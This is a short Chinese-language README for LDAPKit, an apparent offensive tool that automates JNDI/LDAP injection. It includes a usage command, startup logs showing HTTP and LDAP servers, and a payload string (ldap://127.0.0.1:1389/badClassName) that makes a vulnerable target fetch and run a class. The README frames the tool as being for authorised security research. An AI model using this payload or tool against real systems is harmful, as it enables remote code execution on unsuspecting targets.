LDAPKit

工具仅用于安全研究以及内部自查，禁止使用工具发起非法攻击，造成的后果使用者负责

简介

自用的LDAP工具（无高级用法仅支持简单的漏洞复现）

无需自行编译Java文件和开启HTTP服务，一切自动

只要一行：java -jar LDAPKit.jar [命令]

例如：java -jar LDAPKit.jar notepad.exe

    ___  ________   ________  ___  ___  __    ___  _________   
   |\  \|\   ___  \|\   ___ \|\  \|\  \|\  \ |\  \|\___   ___\ 
   \ \  \ \  \\ \  \ \  \_|\ \ \  \ \  \/  /|\ \  \|___ \  \_| 
 __ \ \  \ \  \\ \  \ \  \ \\ \ \  \ \   ___  \ \  \   \ \  \  
|\  \\_\  \ \  \\ \  \ \  \_\\ \ \  \ \  \\ \  \ \  \   \ \  \ 
\ \________\ \__\\ \__\ \_______\ \__\ \__\\ \__\ \__\   \ \__\
 \|________|\|__| \|__|\|_______|\|__|\|__| \|__|\|__|    \|__|
11:32:56 [INFO] [org.sec.Main] start jndi kit
11:32:56 [INFO] [org.sec.Main] cmd: notepad.exe
11:32:56 [INFO] [org.sec.Http] start http server: 0.0.0.0:8000
11:32:56 [INFO] [org.sec.Ldap] start ldap server: 0.0.0.0:1389
|--------------------------------------------------------|
|------Payload: ldap://127.0.0.1:1389/badClassName-------|
|--------------------------------------------------------|

然后......

下载地址

免责申明

未经授权许可使用LDAPKit攻击目标是非法的

本程序应仅用于授权的安全测试与研究目的

Ma1tobiose/LDAPKit

LDAPKit

简介

免责申明